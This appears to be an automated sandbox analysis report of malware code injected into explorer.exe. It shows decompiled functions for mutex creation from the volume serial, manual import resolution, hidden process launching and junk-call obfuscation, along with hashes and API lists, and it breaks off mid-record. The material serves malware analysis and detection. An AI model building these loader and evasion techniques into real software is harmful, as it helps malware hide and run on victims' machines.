Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ClassCreateRegisterWindowmemset
String ID: 0
API String ID: 2030675355-4108050209
Opcode ID: 07fac410c4e789c25f3403dcc314d4d5753339b3d9095dac84e37deb7f0a51d6
Instruction ID: 34432e58cfffa9fe1cb88282914d34288a4e275f70224a04b1bbfda29d22fbbd
Opcode Fuzzy Hash: 07fac410c4e789c25f3403dcc314d4d5753339b3d9095dac84e37deb7f0a51d6
Instruction Fuzzy Hash: 8B412971651118AFEB20DF94DC49FEE7BBCEB09B61F040051F609EB1A1D3B09945DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F582E9, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00F582E9(void* __ecx, void* __edx, void* __eflags) {
				char _v5;
				char _v20;
				char _v60;
				short _v124;
				char _v636;
				void* __edi;
				void* __esi;
				void* _t9;
				intOrPtr _t13;
				void* _t14;
				void* _t19;
				void* _t25;
				void* _t37;
				void* _t38;
				void* _t39;

				_t39 = __eflags;
				_t9 = E00F6157D(__ecx,  &_v636, 0xf7229c); // executed
				_t36 =  &_v60;
				E00F5CDBD( &_v60, _t39, _t9 + 1);
				_t13 = E00F5FA69(_t36, 0x64); // executed
				 *0xf89790 = _t13;
				if(_t13 != 0) {
					_t14 = E00F5CEF9(__edx, 0);
					__eflags = __edx;
					if(__eflags > 0) {
						L10:
						__eflags = 1;
						return 1;
					}
					if(__eflags < 0) {
						L9:
						CreateEnhMetaFileA(0, "P0ye2ZUrSrJ374 X.2MQVv4VaWox5 ,47ep5F7CzU0GVV4GuhSAL6SqqH,ZofW r fcw,U WOY5QUkj24.jpZ9k9hHP FPCSrLqr9qmnU BPXzHhzJkbJU6X6QOZvx8E qPTUOR", 0, 0);
						goto L10;
					}
					__eflags = _t14 - 0x2bcf;
					if(_t14 >= 0x2bcf) {
						goto L10;
					}
					goto L9;
				}
				GetLastError();
				_t19 = E00F5ACD6("IwMfjS,6kDhwBoKnw79JJSbQrfQuypMv9KZ0oKzqJatY  572fl34EFrmGXP 7u.v p5nO qV0CTU9lfIiWtjTaipaPRKMA9w3R6 8tovL4VorlMtuEMTEKdq5XLc  d1gkY3LEl.vC2rud c3E7sTfEg.CZ4jCLHws5nsAnVYGlWYKMIaKNZ7iPbKU8YC,");
				_t37 = 0xf;
				if(_t19 <= _t37) {
					_t37 = _t19;
				}
				_t25 = 0;
				_v5 = 0;
				if(_t37 <= 0) {
					L5:
					return 0;
				} else {
					do {
						_t4 = _t25 + 0x42; // 0x42
						 *((char*)(_t38 + _t25 - 0x10)) = _t4;
						MultiByteToWideChar(0, 0,  &_v20, 0xffffffff,  &_v124, 0x20);
						_t25 = _t25 + 1;
					} while (_t25 < _t37);
					goto L5;
				}
			}

0x00f582e9
0x00f58300
0x00f58308
0x00f5830b
0x00f58316
0x00f5831f
0x00f58326
0x00f58371
0x00f58377
0x00f58379
0x00f58392
0x00f58394
0x00000000
0x00f58394
0x00f5837b
0x00f58384
0x00f5838c
0x00000000
0x00f5838c
0x00f5837d
0x00f58382
0x00000000
0x00000000
0x00000000
0x00f58382
0x00f58328
0x00f58333
0x00f5833b
0x00f5833e
0x00f58340
0x00f58340
0x00f58342
0x00f58344
0x00f5834a
0x00f5836c
0x00000000
0x00f5834c
0x00f5834c
0x00f5834e
0x00f58351
0x00f58361
0x00f58367
0x00f58368
0x00000000
0x00f5834c

APIs

Part of subcall function 00F6157D: memset.MSVCRT ref: 00F61595
Part of subcall function 00F6157D: lstrcpynW.KERNEL32(?,?,00000100,?,00000228,00000105), ref: 00F615BF
Part of subcall function 00F6157D: GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100,?,00000228,00000105), ref: 00F615EF
Part of subcall function 00F6157D: lstrcatW.KERNEL32(?,?), ref: 00F6162A
Part of subcall function 00F6157D: CharUpperBuffW.USER32(?,00000000,?,?,?,?,?,00000228,00000105), ref: 00F6163C

Part of subcall function 00F5FA69: CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,?,00F5831B,?,00000064,00000000,00000000,00000000), ref: 00F5FA79
Part of subcall function 00F5FA69: GetLastError.KERNEL32(?,00F5831B,?,00000064,00000000,00000000,00000000), ref: 00F5FA85

GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00F58328
MultiByteToWideChar.KERNEL32(00000000,00000000,00F58422,000000FF,?,00000020), ref: 00F58361
CreateEnhMetaFileA.GDI32(00000000,P0ye2ZUrSrJ374 X.2MQVv4VaWox5 ,47ep5F7CzU0GVV4GuhSAL6SqqH,ZofW r fcw,U WOY5QUkj24.jpZ9k9hHP FPCSrLqr9qmnU BPXzHhzJkbJU6X6QOZvx8E qPTUOR,00000000,00000000), ref: 00F5838C

Strings

IwMfjS,6kDhwBoKnw79JJSbQrfQuypMv9KZ0oKzqJatY 572fl34EFrmGXP 7u.v p5nO qV0CTU9lfIiWtjTaipaPRKMA9w3R6 8tovL4VorlMtuEMTEKdq5XLc d1gkY3LEl.vC2rud c3E7sTfEg.CZ4jCLHws5nsAnVYGlWYKMIaKNZ7iPbKU8YC,, xrefs: 00F5832E
P0ye2ZUrSrJ374 X.2MQVv4VaWox5 ,47ep5F7CzU0GVV4GuhSAL6SqqH,ZofW r fcw,U WOY5QUkj24.jpZ9k9hHP FPCSrLqr9qmnU BPXzHhzJkbJU6X6QOZvx8E qPTUOR, xrefs: 00F58386

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: CharCreateErrorLast$BuffByteFileInformationMetaMultiMutexUpperVolumeWidelstrcatlstrcpynmemset
String ID: IwMfjS,6kDhwBoKnw79JJSbQrfQuypMv9KZ0oKzqJatY 572fl34EFrmGXP 7u.v p5nO qV0CTU9lfIiWtjTaipaPRKMA9w3R6 8tovL4VorlMtuEMTEKdq5XLc d1gkY3LEl.vC2rud c3E7sTfEg.CZ4jCLHws5nsAnVYGlWYKMIaKNZ7iPbKU8YC,$P0ye2ZUrSrJ374 X.2MQVv4VaWox5 ,47ep5F7CzU0GVV4GuhSAL6SqqH,ZofW r fcw,U WOY5QUkj24.jpZ9k9hHP FPCSrLqr9qmnU BPXzHhzJkbJU6X6QOZvx8E qPTUOR
API String ID: 1208865825-4249171978
Opcode ID: ab3bac85993088aa48c6497cc5aa3a30a2be064c18110e379d3b97bffce7fe95
Instruction ID: 0dd722056b96a2e8fd6200a049d2da9caf143c4fb19bbd10a3e948f908041af8
Opcode Fuzzy Hash: ab3bac85993088aa48c6497cc5aa3a30a2be064c18110e379d3b97bffce7fe95
Instruction Fuzzy Hash: D51194326043546ED711B7B46C8EDBF7B6CE785FA1F200025FB15F6091DE64448FA6A2

Uniqueness

Uniqueness Score: -1.00%

Function 00F5AE0B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E00F5AE0B(void* __ecx, WCHAR* _a4) {
				int _v8;
				void _v526;
				char _v528;
				void _v1046;
				char _v1048;
				intOrPtr _t26;
				char* _t30;
				intOrPtr _t31;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t49;
				void* _t50;

				_t45 = __ecx;
				_v1048 = 0;
				_v8 = 0x104;
				memset( &_v1046, 0, 0x206);
				_v528 = 0;
				memset( &_v526, 0, 0x206);
				_t26 =  *0xf89730; // 0x547f968
				 *((intOrPtr*)(_t26 + 4))(0, 0x1a, 0, 1,  &_v1048);
				_t49 = E00F61102(_t45);
				_t30 =  &_v528;
				__imp__GetUserProfileDirectoryW(_t49, _t30,  &_v8); // executed
				if(_t30 == 0) {
					_t38 =  *0xf89720; // 0xf90000
					if(E00F611E9( *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x110))))) != 0) {
						_t42 =  *0xf89730; // 0x547f968
						 *((intOrPtr*)(_t42 + 4))(0, 0x24, 0, 1,  &_v528);
					}
				}
				_t31 =  *0xf89740; // 0x547f6c8
				 *((intOrPtr*)(_t31 + 0x30))(_t49);
				lstrcpynW(_a4, _t50 + E00F5ADF7( &_v528) * 2 - 0x412, 0x104);
				return 1;
			}

0x00f5ae0b
0x00f5ae1e
0x00f5ae2f
0x00f5ae36
0x00f5ae3e
0x00f5ae4d
0x00f5ae5c
0x00f5ae67
0x00f5ae6f
0x00f5ae75
0x00f5ae7d
0x00f5ae85
0x00f5ae87
0x00f5ae9c
0x00f5aea5
0x00f5aeb0
0x00f5aeb0
0x00f5ae9c
0x00f5aeb3
0x00f5aeb9
0x00f5aed7
0x00f5aee3

APIs

memset.MSVCRT ref: 00F5AE36
memset.MSVCRT ref: 00F5AE4D

Part of subcall function 00F61102: GetCurrentThread.KERNEL32 ref: 00F61115
Part of subcall function 00F61102: GetLastError.KERNEL32(?,00F60E5D,00000105), ref: 00F61123
Part of subcall function 00F61102: GetCurrentProcess.KERNEL32(00000008,00000105,?,00F60E5D,00000105), ref: 00F6113C

GetUserProfileDirectoryW.USERENV(00000000,?,00000104,?,?,?,?,?,00000000), ref: 00F5AE7D
lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 00F5AED7

Strings

`Kqs, xrefs: 00F5AE7D

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: Currentmemset$DirectoryErrorLastProcessProfileThreadUserlstrcpyn
String ID: `Kqs
API String ID: 301261526-2575639055
Opcode ID: 75c42a4528ba20ce5f57cecc9f2acc61af4741dd70e55b9d63582416b777bfcb
Instruction ID: 6ba2b5bb9a728020813456d01677dce362dfcb01f34dca9d799d1a62343470ef
Opcode Fuzzy Hash: 75c42a4528ba20ce5f57cecc9f2acc61af4741dd70e55b9d63582416b777bfcb
Instruction Fuzzy Hash: F8214FB191021CAFD710EFA4DD89EEA73ACFF08300F0440A5B605D7152D6B49E549F61

Uniqueness

Uniqueness Score: -1.00%

Function 00F6157D, Relevance: 7.6, APIs: 5, Instructions: 82
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00F6157D(void* __ecx, WCHAR* __edi, WCHAR* _a4) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				intOrPtr _t22;
				WCHAR* _t26;
				void* _t31;
				long _t36;
				void* _t43;
				WCHAR* _t54;

				_t54 = __edi;
				_t43 = __ecx;
				_v8 = 0;
				memset(__edi, 0, 0x100);
				_t22 =  *0xf89740; // 0x547f6c8
				_v12 = 0x100;
				 *((intOrPtr*)(_t22 + 0xb0))( &_v528,  &_v12);
				lstrcpynW(__edi,  &_v528, 0x100);
				_t26 = E00F62CCE(_t43, 0x832);
				_v16 = _t26;
				if(GetVolumeInformationW(_t26,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100) == 0) {
					_v8 = 0;
				}
				E00F5BA86( &_v16);
				_t31 = E00F5ADF7(_t54);
				E00F5CE46( &(_t54[E00F5ADF7(_t54)]), 0x100 - _t31, L"%u", _v8);
				lstrcatW(_t54, _a4);
				_t36 = E00F5ADF7(_t54);
				_v12 = _t36;
				CharUpperBuffW(_t54, _t36);
				return E00F61785(0, _t54, E00F5ADF7(_t54) + _t38);
			}

0x00f6157d
0x00f6157d
0x00f61592
0x00f61595
0x00f615a8
0x00f615ad
0x00f615b0
0x00f615bf
0x00f615ca
0x00f615e6
0x00f615f4
0x00f615f6
0x00f615f6
0x00f615fd
0x00f6160d
0x00f6161e
0x00f6162a
0x00f61632
0x00f61639
0x00f6163c
0x00f61659

APIs

memset.MSVCRT ref: 00F61595
lstrcpynW.KERNEL32(?,?,00000100,?,00000228,00000105), ref: 00F615BF
GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100,?,00000228,00000105), ref: 00F615EF
lstrcatW.KERNEL32(?,?), ref: 00F6162A
CharUpperBuffW.USER32(?,00000000,?,?,?,?,?,00000228,00000105), ref: 00F6163C

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: BuffCharInformationUpperVolumelstrcatlstrcpynmemset
String ID:
API String ID: 4224442183-0
Opcode ID: 2e6ffaa65bcbbe7f04cc2ae45ced603da31d12d606d35e9d33adc30618b5c30a
Instruction ID: f9ac53a0c2b1303a375b581be07032e4b210435ffe5db3cd1edd8997f6a3e280
Opcode Fuzzy Hash: 2e6ffaa65bcbbe7f04cc2ae45ced603da31d12d606d35e9d33adc30618b5c30a
Instruction Fuzzy Hash: 142156B6900218BFDB01ABA4DC8ADFF777CEF85301F044159F905D2141EA745E54EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F6D1ED, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 142
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E00F6D1ED(signed int __eax, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct HINSTANCE__* _v24;
				signed int _v28;
				signed int _v32;
				struct HINSTANCE__* _v36;
				signed int* _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				struct HINSTANCE__* _t115;
				void* _t157;

				_v8 = _v8 & 0x00000000;
				if(_a4 != 0) {
					_v24 = GetModuleHandleA("kernel32.dll");
					_v12 = E00F5F2C4(_v24, "GetProcAddress");
					_v16 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v20 = _v16;
					if( *((intOrPtr*)(_v20 + 0x80)) == 0) {
						L24:
						return 0;
					}
					_v32 = 0x80000000;
					_t18 = _v20 + 0x80; // 0x6a096a05
					_v44 = _a4 +  *_t18;
					while( *((intOrPtr*)(_v44 + 0xc)) != 0) {
						_v44 = _v44 + 0x14;
					}
					_t26 = _v20 + 0x80; // 0x6a096a05
					_v44 = _a4 +  *_t26;
					while( *((intOrPtr*)(_v44 + 0xc)) != 0) {
						_t115 = LoadLibraryA( *((intOrPtr*)(_v44 + 0xc)) + _a4); // executed
						_v36 = _t115;
						if(_v36 != 0) {
							if( *_v44 == 0) {
								_v40 =  *((intOrPtr*)(_v44 + 0x10)) + _a4;
							} else {
								_v40 =  *_v44 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v40 != 0) {
								_v64 = _v64 & 0x00000000;
								_v60 = _v60 & 0x00000000;
								_v52 = _v52 & 0x00000000;
								_v56 = _v56 & 0x00000000;
								if(( *_v40 & _v32) == 0) {
									_v48 =  *_v40 + _a4;
									_v56 = _v48 + 2;
									_v64 =  *( *((intOrPtr*)(_v44 + 0x10)) + _a4 + _v28);
									_v60 = _v12(_v36, _v56);
								} else {
									_v64 =  *_v40;
									_v56 = _v64 & 0x0000ffff;
									_v60 = _v12(_v36, _v56);
								}
								if(_v64 != _v60) {
									_v8 = _v8 + 1;
									if( *((intOrPtr*)(_v44 + 0x10)) == 0) {
										 *_v40 = _v60;
									} else {
										 *( *((intOrPtr*)(_v44 + 0x10)) + _a4 + _v28) = _v60;
									}
								}
								_v40 =  &(_v40[1]);
								_v28 = _v28 + 4;
							}
							_v44 = _v44 + 0x14;
							continue;
						}
						_t157 = 0xfffffffd;
						return _t157;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

0x00f6d1f3
0x00f6d1fb
0x00f6d210
0x00f6d222
0x00f6d22e
0x00f6d234
0x00f6d241
0x00f6d3a4
0x00000000
0x00f6d3a4
0x00f6d247
0x00f6d254
0x00f6d25a
0x00f6d25d
0x00f6d26c
0x00f6d26c
0x00f6d277
0x00f6d27d
0x00f6d280
0x00f6d297
0x00f6d29d
0x00f6d2a4
0x00f6d2b4
0x00f6d2cc
0x00f6d2b6
0x00f6d2be
0x00f6d2be
0x00f6d2cf
0x00f6d2d3
0x00f6d2df
0x00f6d2e3
0x00f6d2e7
0x00f6d2eb
0x00f6d2f7
0x00f6d322
0x00f6d32a
0x00f6d33c
0x00f6d348
0x00f6d2f9
0x00f6d2fe
0x00f6d309
0x00f6d315
0x00f6d315
0x00f6d351
0x00f6d357
0x00f6d361
0x00f6d37d
0x00f6d363
0x00f6d372
0x00f6d372
0x00f6d361
0x00f6d385
0x00f6d38e
0x00f6d38e
0x00f6d39c
0x00000000
0x00f6d39c
0x00f6d2a8
0x00000000
0x00f6d2a8
0x00000000
0x00f6d280
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00F5470F,?), ref: 00F6D20A
LoadLibraryA.KERNELBASE(00000000), ref: 00F6D297

Strings

GetProcAddress, xrefs: 00F6D213
kernel32.dll, xrefs: 00F6D205

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: 984dc34d500dde1626a070df25306975fc864fc4cd143e4c2ac586c13bd99df7
Instruction ID: d3192f0094505edc31d05a81deb583d706f7dae7cfe4de14b7a12dfb6202936e
Opcode Fuzzy Hash: 984dc34d500dde1626a070df25306975fc864fc4cd143e4c2ac586c13bd99df7
Instruction Fuzzy Hash: EC614775E00208AFCB04CF98D985BECBBF1BF08365F284469E815AB361D774A984DF64

Uniqueness

Uniqueness Score: -1.00%

Function 00F5424B, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00F5424B() {
				intOrPtr _v8;
				intOrPtr _v12;
				CHAR* _v16;
				signed int _v20;
				void* __edi;
				void* __esi;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				void* _t30;
				signed int _t34;
				intOrPtr _t37;
				intOrPtr _t38;
				signed int _t39;
				CHAR* _t42;
				void* _t44;

				_t39 =  *0xf89814; // 0x2
				_t40 = _t39 * 0x64;
				_t34 = 0;
				_v20 = _t39 * 0x64;
				_t42 = E00F5AC58(_t40);
				_v16 = _t42;
				if(_t42 != 0) {
					_v12 = 0;
					__eflags =  *0xf89814; // 0x2
					if(__eflags <= 0) {
						L9:
						E00F5CBB0(_t42,  *0xf897e8, 0xe); // executed
						E00F5AB81( &_v16, _t34);
						__eflags = 0;
						return 0;
					}
					_v8 = 0;
					do {
						_t27 =  *0xf89718; // 0x547bdf0
						_t37 = _v8;
						__eflags =  *(_t37 + _t27);
						if( *(_t37 + _t27) != 0) {
							__eflags = _t34;
							if(_t34 != 0) {
								lstrcatA(_t42, 0xf7b208);
								_t34 = _t34 + 1;
								__eflags = _t34;
							}
							_t29 = _v8;
							_t38 =  *0xf89718; // 0x547bdf0
							_push( *((intOrPtr*)(_t29 + _t38 + 0x10)));
							_push( *((intOrPtr*)(_t29 + _t38 + 8)));
							_t30 = E00F5CFBA(_t40 - _t34,  &(_t42[_t34]), "%u;%u;%u",  *((intOrPtr*)(_t29 + _t38)));
							_t44 = _t44 + 0x10;
							_t34 = _t34 + _t30;
							__eflags = _t34;
							BitBlt(0, 0x57, 0x56, 0xc, 0x2f, 0, 0x14, 0x36, 0x44);
							_t42 = _v16;
							_t40 = _v20;
						}
						_v12 = _v12 + 1;
						_t28 = _v12;
						_v8 = _v8 + 0x20;
						__eflags = _t28 -  *0xf89814; // 0x2
					} while (__eflags < 0);
					goto L9;
				}
				return 0xffffffff;
			}

0x00f54254
0x00f5425a
0x00f5425e
0x00f54260
0x00f54268
0x00f5426d
0x00f54272
0x00f5427c
0x00f5427f
0x00f54285
0x00f54300
0x00f5430a
0x00f54314
0x00f5431c
0x00000000
0x00f5431c
0x00f54287
0x00f5428a
0x00f5428a
0x00f5428f
0x00f54292
0x00f54296
0x00f54298
0x00f5429a
0x00f542a2
0x00f542a8
0x00f542a8
0x00f542a8
0x00f542a9
0x00f542ac
0x00f542b2
0x00f542b8
0x00f542c6
0x00f542cb
0x00f542e0
0x00f542e0
0x00f542e2
0x00f542e8
0x00f542eb
0x00f542eb
0x00f542ee
0x00f542f1
0x00f542f4
0x00f542f8
0x00f542f8
0x00000000
0x00f5428a
0x00000000

APIs

Part of subcall function 00F5AC58: RtlAllocateHeap.NTDLL(00000008,?,?,00F5B755,00000100,00000000,00F54903), ref: 00F5AC66

lstrcatA.KERNEL32(00000000,00F7B208,00000000,-00000020,60C3A5A2,?,00F5418D,00000000,00000000), ref: 00F542A2
BitBlt.GDI32(00000000,00000057,00000056,0000000C,0000002F,00000000,00000014,00000036,00000044), ref: 00F542E2

Strings

%u;%u;%u, xrefs: 00F542C1
, xrefs: 00F542F4

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeaplstrcat
String ID: $%u;%u;%u
API String ID: 3011335133-2815652646
Opcode ID: 12ba173c5c9665326fe270a282716ffdb12b4b664a4e3263ff734905b052b8e4
Instruction ID: 0056a78f204c47a640080aa2f5697962851b90fe011832684be7f14b07a0a389
Opcode Fuzzy Hash: 12ba173c5c9665326fe270a282716ffdb12b4b664a4e3263ff734905b052b8e4
Instruction Fuzzy Hash: 8E21C471E00218AFEB20AFA8DC82FAD77B5EB04719F050165FA15B72D2D7B05D44EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F5BAA0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E00F5BAA0(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, intOrPtr _a16) {
				WCHAR* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v100;
				intOrPtr _t32;
				intOrPtr _t34;
				intOrPtr _t37;

				_v8 = 0;
				memset( &_v100, 0, 0x44);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v100.cb = 0x44;
				if(_a16 != 0) {
					_v100.dwFlags = 1;
					_v100.wShowWindow = 0;
					_v8 = 0x8000000;
				}
				if(CreateProcessW(0, _a4, 0, 0, 0, _v8, 0, 0,  &_v100,  &_v24) == 0) {
					return 0;
				} else {
					if(_a8 != 0) {
						_push(_a12);
						_t37 =  *0xf89740; // 0x547f6c8
						_push(_v24.hProcess);
						if( *((intOrPtr*)(_t37 + 0x2c))() >= 0) {
							GetExitCodeProcess(_v24.hProcess, _a8);
						}
					}
					_t32 =  *0xf89740; // 0x547f6c8
					 *((intOrPtr*)(_t32 + 0x30))(_v24.hThread);
					_t34 =  *0xf89740; // 0x547f6c8
					 *((intOrPtr*)(_t34 + 0x30))(_v24);
					return 1;
				}
			}

0x00f5bab1
0x00f5bab4
0x00f5babe
0x00f5babf
0x00f5bac0
0x00f5bac1
0x00f5bac8
0x00f5bad2
0x00f5bad6
0x00f5bad9
0x00f5badd
0x00f5badd
0x00f5bb02
0x00000000
0x00f5bb04
0x00f5bb07
0x00f5bb09
0x00f5bb0c
0x00f5bb11
0x00f5bb19
0x00f5bb21
0x00f5bb21
0x00f5bb19
0x00f5bb2a
0x00f5bb2f
0x00f5bb35
0x00f5bb3a
0x00000000
0x00f5bb3d

APIs

memset.MSVCRT ref: 00F5BAB4
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000044,?,?,00000000,00000001), ref: 00F5BAFD
GetExitCodeProcess.KERNEL32 ref: 00F5BB21

Strings

D, xrefs: 00F5BAC8

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: Process$CodeCreateExitmemset
String ID: D
API String ID: 4170947310-2746444292
Opcode ID: 395a2aad0cf8c4b6ada3e4c62d4159fde31f6fe5ac280a836b0a0b7ac2f4968c
Instruction ID: ee0484238c8b7ebd72ff3ed8225f0b5c2455f9268d6b24ce8949e5d68c9cbfa8
Opcode Fuzzy Hash: 395a2aad0cf8c4b6ada3e4c62d4159fde31f6fe5ac280a836b0a0b7ac2f4968c
Instruction Fuzzy Hash: 4021E571911118BFDB519FAACD08EEFBBB9FF48251B140025FA09E6120D7709A14EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00F54827, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00F54827(void* __ebx, WCHAR* __edx, void* __eflags) {
				char _v288;
				void* __esi;
				intOrPtr _t4;
				WCHAR* _t5;
				WCHAR* _t7;
				void* _t8;
				intOrPtr _t9;
				int _t11;
				void* _t12;
				void* _t15;
				WCHAR* _t20;
				void* _t21;

				_t20 = __edx;
				if(E00F55945(__ebx, __eflags) == 0) {
					_t4 =  *0xf89720; // 0xf90000
					_t5 = E00F54B68(0, __eflags,  *((intOrPtr*)(_t4 + 0xac)), 0); // executed
					 *0xf89748 = _t5;
					__imp__GetCPInfoExA(0x21, 0x21,  &_v288, _t21);
					__eflags =  *0xf89748; // 0x330
					if(__eflags != 0) {
						_t7 = E00F5C3EF();
						__eflags = _t7;
						if(_t7 == 0) {
							L11:
							_t8 = 0;
							__eflags = 0;
						} else {
							_t9 =  *0xf89720; // 0xf90000
							_t11 = lstrcmpiW(_t9 + 0x228, _t7);
							__eflags = _t11;
							if(_t11 != 0) {
								goto L11;
							} else {
								_t12 = E00F5CEF9(_t20, 0);
								__eflags = _t20;
								if(__eflags <= 0) {
									if(__eflags < 0) {
										L9:
										CreateEnhMetaFileA(0, "2FDdTXhMdBWmsUIucHcnYKTLCRNDMFEicMKkRqAcjpBK8QWoSfew8 1wfisaAps peReXdq7RteB4XTk,woA qeNgw1HKrydyCy3YdgrYKctmhbu,EIXFXuMCUjP.EWlPoHO6Zl1PHXE36EucM.vgupJW jdCt4y7Hz1iR6pFwFEzri 4GFcDLoGV4vrc EcBzTHAokW39ego0abJSok9KYk8d4IoRkn  xUz5y Nmn.CatXrJ JxEoxk,5a6bVpbMLiWqYK1xoN18Gt1VKxq32MUHDBYlJqiG3cec1RtyGMZ0KlSRBdxLDg j3 B1CCDrIh7 Id dWE4yfZsyBO3ic3fWSx8ExtEYGY BlXK41.14m0ok.tgdWOIjf5UWe3NlKYqdumCTAe4RHDagT278bzT6K9IlGkzs9lU,,5 HTqiemxWkLzdIt8S5Q89tv1Saiyplix uq.EQc0 NkIJ0 FhFCCUub5Ak xoT5R2YbwHzx93gmBBSj gzcn84S.Ulek7 Ufl0asxB 9 5gvQ0GBKLvR8FesAgsL 8MAKjUUbYP5uSFhLUcR hwd8faYflpV .XEwyoZgE6NG.W6Ri4W7ul2FYOkgOylI5 H6FXJ4k  RYtMgy83Gg9ATbTojzY8pwA9Pj2z6S2M4iOsGAyRm i qE0OBpYibotkD.pxvlid,5ibAl,D Da61gGR Uy9Q, OK02KjJdrBmc1aldBo,rlwXvwYRTnGn0eaGrPidp0u,iRv1Ri1ZKVulmTUlNg6,4Z QyM26iuPw2ojgt6J87VMquvqiYo,gqcox. LgR5ZdwdoxAhzroKjBiC3Ir xB f3UG9BF0cwqncmbYDC3,wiOQs83tdA cjx,2LoN9ZXf.HskNNxiKmUFwRjY52 YaZHPP7NvLOHqm5CnwmZxNozzDgPRl0oMI,HFcmzskb1F12PpG8iaxug.oY,,HPBI.wCMukoHxYrqbp2pd94DqrTy nnDT,TcGbWuz.7lzECecIQ0kWgLAnks3cQXrSsTpC2", 0, 0);
									} else {
										__eflags = _t12 - 0x2bcf;
										if(_t12 < 0x2bcf) {
											goto L9;
										}
									}
								}
								_t8 = 1;
							}
						}
					} else {
						_t8 = 2;
					}
					return _t8;
				} else {
					_t15 = 3;
					return _t15;
				}
			}

0x00f54827
0x00f54837
0x00f5483e
0x00f5484d
0x00f54854
0x00f54864
0x00f5486a
0x00f54870
0x00f54877
0x00f5487c
0x00f5487e
0x00f548bd
0x00f548bd
0x00f548bd
0x00f54880
0x00f54881
0x00f5488c
0x00f54892
0x00f54894
0x00000000
0x00f54896
0x00f54897
0x00f5489d
0x00f5489f
0x00f548a1
0x00f548aa
0x00f548b2
0x00f548a3
0x00f548a3
0x00f548a8
0x00000000
0x00000000
0x00f548a8
0x00f548a1
0x00f548ba
0x00f548ba
0x00f54894
0x00f54872
0x00f54874
0x00f54874
0x00f548c1
0x00f54839
0x00f5483b
0x00f5483d
0x00f5483d

APIs

Part of subcall function 00F55945: Arc.GDI32(00000000,00000054,0000000F,0000004D,00000049,0000000E,0000001F,0000003D,00000015), ref: 00F5598B
Part of subcall function 00F55945: GetLastError.KERNEL32 ref: 00F55995
Part of subcall function 00F55945: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00F559D2

GetCPInfoExA.KERNEL32(00000021,00000021,?), ref: 00F54864

Strings

